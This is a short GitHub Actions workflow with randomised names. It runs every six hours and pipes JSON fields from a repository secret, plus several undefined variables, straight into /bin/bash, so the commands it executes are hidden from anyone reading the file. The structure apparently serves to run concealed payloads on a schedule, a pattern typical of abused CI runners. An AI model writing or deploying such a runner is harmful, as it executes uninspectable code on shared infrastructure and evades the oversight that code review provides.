name: zhouyiri2245

on:
  workflow_dispatch:
  schedule:
    - cron: '52 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhouyiri2245
        env:
          jcl482: ${{ secrets.jcl482 }}
        run: |
          echo $jcl482 | jq -r .dqzcz29 | /bin/bash
          echo $x206 | jq -r .leh83 | /bin/bash
          echo $no24766 | jq -r .wz7841 | /bin/bash
          echo $z0 | jq -r .wejc8 | /bin/bash
          echo $fzy98460 | jq -r .kcwv6614 | /bin/bash

